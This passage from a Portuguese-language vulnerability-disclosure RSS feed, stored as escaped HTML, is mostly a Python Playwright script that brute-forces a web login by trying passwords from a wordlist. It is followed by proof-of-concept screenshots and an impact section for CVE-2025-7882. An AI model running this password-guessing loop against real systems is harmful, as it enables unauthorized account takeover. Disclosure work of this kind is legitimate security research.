class=&amp;#34;n&amp;#34;&amp;gt;fill&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;get_by_role&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;textbox&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;name&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Senha de Login&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;press&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Enter&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;time&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;sleep&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;try&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;get_by_text&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Avançado&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;exact&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;True&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;timeout&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2000&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;return&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;True&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;except&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;return&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;False&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;def&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nf&amp;#34;&amp;gt;run&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;amp;gt;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;None&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;browser&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;chromium&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;launch&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;headless&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;False&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;context&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;browser&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;new_context&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;context&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;new_page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senhas&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;carrega_senhas&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;senhas.txt&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;for&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;idx&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senha&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;ow&amp;#34;&amp;gt;in&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;enumerate&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senhas&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;):&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;print&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;sa&amp;#34;&amp;gt;f&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;[&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;idx&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;}&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;len&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senhas&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;}&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;] Testando senha: &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;!r}&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;if&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tenta_login&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;):&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;print&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;sa&amp;#34;&amp;gt;f&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;amp;gt;&amp;amp;gt; Sucesso! Senha encontrada: &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;senha&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;!r}&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;page&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;get_by_text&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Avançado&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;exact&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;True&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;click&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;break&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;else&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;print&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Nenhuma senha funcionou.&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;context&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;close&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;browser&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;close&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;if&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;name&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;==&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;main&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;with&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;sync_playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;()&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;as&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;run&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;playwright&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;r&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7882/image.png&amp;#34;
	width=&amp;#34;1878&amp;#34;
	height=&amp;#34;950&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7882/image_hu_91b4360fd68a28ba.png 480w, /p/cve-2025-7882/image_hu_d141f112b09e10d2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;197&amp;#34;
		data-flex-basis=&amp;#34;474px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7882/image-1.png&amp;#34;
	width=&amp;#34;1889&amp;#34;
	height=&amp;#34;1016&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7882/image-1_hu_2f38919172f7d0b7.png 480w, /p/cve-2025-7882/image-1_hu_268f297aff1b93f7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;446px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7882/image-2.png&amp;#34;
	width=&amp;#34;489&amp;#34;
	height=&amp;#34;534&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7882/image-2_hu_e9f740f724ca4e72.png 480w, /p/cve-2025-7882/image-2_hu_44ca76c3433fa5cf.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;91&amp;#34;
		data-flex-basis=&amp;#34;219px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7882/image-3.png&amp;#34;
	width=&amp;#34;442&amp;#34;
	height=&amp;#34;542&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7882/image-3_hu_b2613553a6c02900.png 480w, /p/cve-2025-7882/image-3_hu_9d0794b8a52b243e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;81&amp;#34;
		data-flex-basis=&amp;#34;195px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7882/image-4.png&amp;#34;
	width=&amp;#34;1830&amp;#34;
	height=&amp;#34;933&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7882/image-4_hu_89b33ba6038c9b72.png 480w, /p/cve-2025-7882/image-4_hu_9581ddd2580c03c9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;196&amp;#34;
		data-flex-basis=&amp;#34;470px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/_t3ZC8zU4-A&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/_t3ZC8zU4-A&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A falta de validação de sessão neste endpoint pode levar a vários riscos de segurança:&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Exposição de Dados Não Autorizada:&amp;lt;/b&amp;gt; Usuários não autenticados podem enumerar ou recuperar dados internos confidenciais.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Escalonamento de Privilégios:&amp;lt;/b&amp;gt; Invasores podem acessar ou inferir informações destinadas apenas a usuários autorizados.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Divulgação de Informações:&amp;lt;/b&amp;gt; Lógica de negócios e IDs internos (como funções ou permissões de usuário) podem ser vazados.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Suporte de Reconhecimento:&amp;lt;/b&amp;gt; Facilita o mapeamento de estruturas de backend para ataques mais direcionados.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7882.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7882.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53946</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53946/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53946/</guid>
